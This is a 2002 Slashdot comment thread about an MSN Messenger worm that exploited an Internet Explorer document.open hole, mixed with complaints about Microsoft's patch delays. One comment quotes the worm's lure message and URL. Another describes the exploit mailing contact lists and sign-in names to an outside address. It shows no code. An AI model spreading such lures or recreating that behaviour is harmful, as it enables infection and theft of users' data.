    I went to Windows Update this morning looking to update my IE using that uber patch. Said no critical updates. I had to go to technet and download the patch from there.

    Why the hell does it take Microsoft so long to get patches onto Windows Update, which most users use to get their updates (those that look)?

    Like, when I heard about the SNMP problem yesterday, I went to rhn.redhat.com, found an update for snmp, did a select all for all my linux boxes i adminster at work, scheduled them to be updated, done. I got look for an SNMP update for my Windows servers, none found.

    It's just annoying... Microsoft has billions for R&D, takes weeks to get a patch out on Windows update, yet some kid can write autorpm that does the same kinda thing for linux in his spare time...

  • I hate Microsoft, but my favourite part isn't this story. My favourite part is the link directly under it.

    < What is .NET? | Linus Merges ALSA Into 2.5.4 >

    You gotcher answer, folks.
  • they're ActiveX viruses, and will do more than send MSN Messenges to your friends if you're using IE
  • It's 9:35 pm EST, and Windows Update [microsoft.com] seems to have fallen off the DNS. Interesting timing, that. Is it just my ISP? Microsoft forget to pay its bills, again? Or is something more sinister at work?

    Maybe it's just me, but my inner conspiracy theorist is telling me that someone evil enough to start an IM worm using a patchable exploit could also be evil enough to cut off the first place people would go to look for that patch.

  • by Shuh (13578) on Wednesday February 13, 2002 @10:39PM (#3004804) Journal
    Why not add a Javascript ticker-tape display to Slashdot so we can just watch the M$ virii/security-holes flash by like so many stock market reports?
  • Was this before or after they investigated the code for security problems per the new order?
  • It's evolved (Score:2, Insightful)

    by LichP (549726)
    The version I got reads

    URGENT - Go to http://users.skynet.be/dark.angel/cool.htm

    I went, but Mozilla crashed on accessing the site so I wasn't affected. Then I got a clone message, and the evil purpose rapdily became clear. Anyone peaked at this to see if the code is essentially the same?

    --
    From Phil
  • Explanation of code (Score:3, Informative)

    by tomgilder (255203) on Thursday February 14, 2002 @04:28AM (#3005755) Homepage
    Hi there, I was the one along with Thor Larholm who originally demoed this exploit on my website [tom.me.uk].

    We did so as to attempt to put pressure on Microsoft to patch several major holes in Internet Explorer - the one we exploited (document.open) took MS exactly fifty four days to make a patch from, from it being publicly disclosed.

    We felt this was pathetic, and the public had a right to know what Microsoft's bad programming could cause - none of the previous examples of the document.open hole had shown to what extent this could be exploited.

    This new worm, although harmless, is a direct rip of the example code [slashdot.org] from our bulletin, modified to also e-mail the contact list and MSN sing-in name to an e-mail address.

    As long as Microsoft continues to support the flawed security model of ActiveX, integrating products together this closely, such things will continue to happen.

    The next MSN worm might be far worse.

    Please, please all Internet Explorer users patch your systems now [microsoft.com]. If you are using IE5.0 or lower, MS haven't produced a patch for you - they clearly care more about their product lifecycles than customer's security. I strongly suggest upgrading to 5.5 or 6, failing that disable active scripting.

    I'm also interested as to why Slashdot felt the need to approve this article about a worm, as several people submitted stories about my original MSN exploit example. Oh well, guess you need things in the wild before telling people?

  • by jonr (1130) on Thursday February 14, 2002 @05:50AM (#3005911) Homepage Journal
    Well, I tried the Register demostration page, and I only got this:
    "Sorry, there was an error in the script.
    This may well be due to your IE security settings - try resetting them to default and trying again.
    ..."
    IE6 is much better when it comes to security and privacy than IE5.

Real Programmers don't write in PL/I. PL/I is for programmers who can't decide whether to write in COBOL or FORTRAN.

Working...